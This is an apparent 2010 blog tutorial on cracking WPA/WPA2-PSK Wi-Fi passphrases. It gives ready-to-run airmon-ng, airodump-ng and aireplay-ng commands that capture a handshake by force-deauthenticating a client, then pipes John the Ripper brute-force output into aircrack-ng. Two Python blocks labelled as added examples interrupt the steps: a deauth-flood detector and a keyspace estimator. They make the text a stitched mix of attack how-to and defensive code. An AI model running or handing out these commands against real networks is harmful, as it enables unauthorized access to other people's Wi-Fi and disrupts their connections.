Friday, April 16, 2010

HOWTO : Crack WPA/WPA2-PSK with John the Ripper

At the moment, we need to use dictionaries to brute-force WPA/WPA2-PSK. That means the key to be cracked must already be in your dictionary.

I have a better solution to crack WPA/WPA2-PSK (in theory, it must eventually succeed), but it requires hours to years, depending on the strength of the key and the speed of the hardware. The following tutorial is based on Back|Track 4.

Suppose the wifi channel is 5, the BSSID MAC is 00:24:B2:A0:51:14 and the client MAC is 00:14:17:94:90:0D. Make sure the client is connected to the wifi router while you perform Steps 1 to 4.

Step 1 :
airmon-ng start wlan0

Step 2 :
airodump-ng mon0

Step 3 :
airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

Step 4 :
aireplay-ng --deauth 10 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0

Once you have captured the handshake, go to the next step. If not, repeat Step 4 until you get the handshake.
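Step 4 is visible from the other side: a deauthentication burst like the one aireplay-ng sends is easy to spot in a monitor-mode capture. The following detector is an added example, not code from the original post. It parses raw 802.11 management frames (assumed to be stored without a radiotap header, for simplicity) and raises an alert when one source address sends more deauth frames to one destination than a threshold allows inside a short time window. The sample capture is constructed by hand inside the block; only the BSSID and client MAC come from the post, and the threshold, window and timestamps are assumptions.

```python
"""Deauthentication-flood detector over raw 802.11 management frames.

Added example for the post above; the capture below is constructed, not
recorded. Frames are assumed to start at the 802.11 MAC header (no
radiotap). Threshold and window are illustrative defaults.
"""
import struct
from collections import defaultdict, deque

BSSID = "00:24:b2:a0:51:14"    # access point from the post
CLIENT = "00:14:17:94:90:0d"   # client from the post

SUBTYPE_BEACON = 8
SUBTYPE_DEAUTH = 12
HDR_LEN = 24  # frame control, duration, addr1..addr3, sequence control
HDR_FMT = "<HH6s6s6sH"


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_mgmt_frame(subtype, dst, src, bssid, seq, body=b""):
    """Constructed sample frame: type 0 (management) with the given subtype.
    In a management frame addr1 is the destination, addr2 the source and
    addr3 the BSSID."""
    fc = (subtype << 4) | (0 << 2)  # protocol version 0, type 0
    header = struct.pack(HDR_FMT, fc, 0, mac_bytes(dst), mac_bytes(src),
                         mac_bytes(bssid), seq << 4)
    return header + body


def parse_mgmt_frame(raw):
    """Return (subtype, dst, src, bssid, body), or None if the frame is
    too short or is not a management frame."""
    if len(raw) < HDR_LEN:
        return None
    fc, _dur, a1, a2, a3, _seq = struct.unpack(HDR_FMT, raw[:HDR_LEN])
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    if ftype != 0:
        return None
    return subtype, mac_str(a1), mac_str(a2), mac_str(a3), raw[HDR_LEN:]


def detect_deauth_flood(frames, threshold=5, window=2.0):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes).
    Returns one (timestamp, src, dst, count) alert per (src, dst) pair
    whose deauth count inside `window` seconds reaches `threshold`."""
    recent = defaultdict(deque)  # (src, dst) -> timestamps of recent deauths
    alerted = set()
    alerts = []
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if parsed is None or parsed[0] != SUBTYPE_DEAUTH:
            continue  # beacons, probes etc. are not counted
        _, dst, src, _bssid, _body = parsed
        key = (src, dst)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:  # slide the window forward
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((ts, src, dst, len(q)))
    return alerts


def sample_capture():
    """Constructed capture: three beacons, one ordinary deauth from the
    client (reason 3, station leaving), then ten deauths addressed to the
    client with the BSSID as source (reason 7) within half a second."""
    frames = []
    for i in range(3):
        frames.append((i * 0.1, build_mgmt_frame(
            SUBTYPE_BEACON, "ff:ff:ff:ff:ff:ff", BSSID, BSSID, i)))
    frames.append((0.5, build_mgmt_frame(
        SUBTYPE_DEAUTH, BSSID, CLIENT, BSSID, 10, struct.pack("<H", 3))))
    for i in range(10):
        frames.append((1.0 + i * 0.05, build_mgmt_frame(
            SUBTYPE_DEAUTH, CLIENT, BSSID, BSSID, 20 + i, struct.pack("<H", 7))))
    return frames


if __name__ == "__main__":
    for ts, src, dst, count in detect_deauth_flood(sample_capture()):
        print("t=%.2fs deauth flood: %s -> %s (%d frames in window)" % (ts, src, dst, count))
```

The single deauth from the client never reaches the threshold, while the burst trips the alert on its fifth frame; in a real deployment the same logic would sit behind a pcap reader that strips the radiotap header first.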

Step 5 :
/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:24:B2:A0:51:14 -w - output*.cap

You then have to wait hours or years for the cracking to finish, depending on how powerful your hardware is and how strong the key is. CUDA makes the work easier, but it may still take years; it just depends.
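To put "hours or years" in numbers: the search in Step 5 has to try every candidate in the keyspace, and each candidate goes through PBKDF2-HMAC-SHA1 before it can be tested, which keeps the rate far below that of fast hashes. The estimator below is an added example, not part of the original post. It computes the keyspace for a passphrase of a given length and character set, the corresponding entropy in bits, and the worst-case search time at an assumed rate; the two rates used at the bottom (a CPU and a CUDA figure) are placeholders for illustration, not benchmarks. The only facts it relies on are that WPA/WPA2 passphrases are 8 to 63 characters long and the sizes of the usual character classes.

```python
"""Keyspace and brute-force time estimator for WPA/WPA2 passphrases.

Added example for the post above. Rates are assumed placeholders, not
measured values; use your own benchmark numbers in practice.
"""
import math

SECONDS_PER_YEAR = 365.25 * 24 * 3600
WPA_MIN_LEN = 8   # WPA/WPA2-PSK passphrase minimum length
WPA_MAX_LEN = 63  # WPA/WPA2-PSK passphrase maximum length

CHARSETS = {
    "digits": 10,        # 0-9
    "lowercase": 26,     # a-z
    "alphanumeric": 62,  # a-z, A-Z, 0-9
    "printable": 95,     # printable ASCII
}


def keyspace(charset_size, length):
    """Number of candidates of exactly `length` characters."""
    if not WPA_MIN_LEN <= length <= WPA_MAX_LEN:
        raise ValueError("WPA passphrases are %d to %d characters" % (WPA_MIN_LEN, WPA_MAX_LEN))
    return charset_size ** length


def keyspace_upto(charset_size, max_length):
    """Candidates of every valid length up to `max_length`, which is what an
    incremental search has to cover before it can be sure of a hit."""
    return sum(charset_size ** n for n in range(WPA_MIN_LEN, max_length + 1))


def entropy_bits(charset_size, length):
    """Entropy of a uniformly random passphrase, in bits."""
    return length * math.log2(charset_size)


def worst_case_seconds(candidates, rate_per_second):
    """Time to exhaust the keyspace at the given candidates-per-second rate."""
    return candidates / rate_per_second


def describe(seconds):
    """Human-readable duration."""
    if seconds < 3600:
        return "%.0f seconds" % seconds
    if seconds < 86400:
        return "%.1f hours" % (seconds / 3600)
    if seconds < SECONDS_PER_YEAR:
        return "%.1f days" % (seconds / 86400)
    return "%.1f years" % (seconds / SECONDS_PER_YEAR)


def estimate(charset_name, length, rate_per_second):
    """Summary for one passphrase class at one assumed rate."""
    size = CHARSETS[charset_name]
    n = keyspace(size, length)
    worst = worst_case_seconds(n, rate_per_second)
    return {
        "candidates": n,
        "bits": entropy_bits(size, length),
        "worst_case_seconds": worst,
        "expected_seconds": worst / 2,  # on average the key is found halfway
    }


if __name__ == "__main__":
    # Assumed placeholder rates: one CPU core vs. a CUDA setup.
    for label, rate in (("cpu (assumed 1,000/s)", 1_000), ("cuda (assumed 100,000/s)", 100_000)):
        print(label)
        for charset in ("digits", "lowercase", "alphanumeric", "printable"):
            for length in (8, 10, 12):
                e = estimate(charset, length, rate)
                print("  %-12s len %2d  %5.1f bits  worst case %s" % (
                    charset, length, e["bits"], describe(e["worst_case_seconds"])))
```

The table makes the post's point concrete: a hundredfold faster rate shaves two orders of magnitude off the time, but adding four printable characters to a passphrase adds more than six orders of magnitude of keyspace, so length wins.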

WARNING : Do NOT crack any wifi router without authorization or you will be put in jail.

That's all. See you!